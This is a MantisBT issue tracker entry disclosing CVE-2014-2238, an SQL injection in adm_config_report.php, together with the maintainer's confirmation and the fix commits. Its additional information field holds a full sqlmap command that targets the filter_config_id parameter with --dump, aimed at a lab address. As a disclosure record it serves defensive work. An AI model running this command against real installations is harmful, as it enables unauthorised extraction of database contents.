View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0017055 | mantisbt | security | public | 2014-02-28 11:00 | 2014-03-03 14:24 |
Reporter | HauntIT | Assigned To | dregad | ||
Priority | immediate | Severity | major | Reproducibility | always |
Status | closed | Resolution | fixed | ||
Product Version | 1.2.13 | ||||
Target Version | 1.2.17 | Fixed in Version | 1.2.17 | ||
Summary | 0017055: CVE-2014-2238: SQL injection vulnerability in adm_config_report.php | ||||
Description | Jakub Galczyk from HauntIT discovered an SQL injection vulnerability in manage configuration page. | ||||
Additional Information | k@lab:~/src/sqlmap$ ./sqlmap.py -u "http://10.149.14.62//k/cms/mantis/mantisbt-1.2.16/adm_config_report.php" --data "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-2&apply_filter_button=Apply+Filter" -cookie "groupoffice=l8iqg3amg3klb0rn39u2ms19q3; p7token=2aec66601c948d5bf84eae77cc743529; itop-6e03ab144a03733e272e7756ba585991=ual3fb0vsqm9847uodsvs79472; PHPSESSID=3srq832a7cfmn6dku1ttr70tq1; utma=65758510.2100553510.1393586134.1393586134.1393586134.1; utmc=65758510;__utmz=65758510.1393586134.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MANTIS_secure_session=1; MANTIS_STRING_COOKIE=f53b003d0014eeea9028334751d8c28bf8f23e56fe7bc77e46bbe7c857a280f4; MANTIS_PROJECT_COOKIE=1; MANTIS_MANAGE_CONFIG_COOKIE=0%3A0%3A-2; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_BUG_LIST_COOKIE=1;" --dbms=mysql --dump
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 15:19:12 [15:19:12] [INFO] testing connection to the target URL [15:23:13] [WARNING] POST parameter 'apply_filter_button' is not injectable
| ||||
Tags | No tags attached. | ||||
I can confirm the vulnerability, which is due to inlining query parameters instead of using db_param(). Bug was introduced in 1.2.13, by commit f8a81a33880752364ea47bdd9a987bff986c81de |
|
sqlmap test after patching:
|
|
CVE request http://thread.gmane.org/gmane.comp.security.oss.general/12241 |
|
MantisBT: master-1.2.x a608f2d0 2014-02-28 07:23 Details Diff |
Fix SQL injection vulnerability in adm_config_report.php Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in MantisBT 1.2.13. Root cause is the use of unsanitized inlined query parameters. Fixes 0017055 |
Affected Issues 0017055 |
|
mod - adm_config_report.php | Diff File | ||
MantisBT: master e8bdd248 2014-02-28 07:23 Details Diff |
Fix SQL injection vulnerability in adm_config_report.php Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in MantisBT 1.2.13. Root cause is the use of unsanitized inlined query parameters. Fixes 0017055 |
Affected Issues 0017055 |
|
mod - adm_config_report.php | Diff File |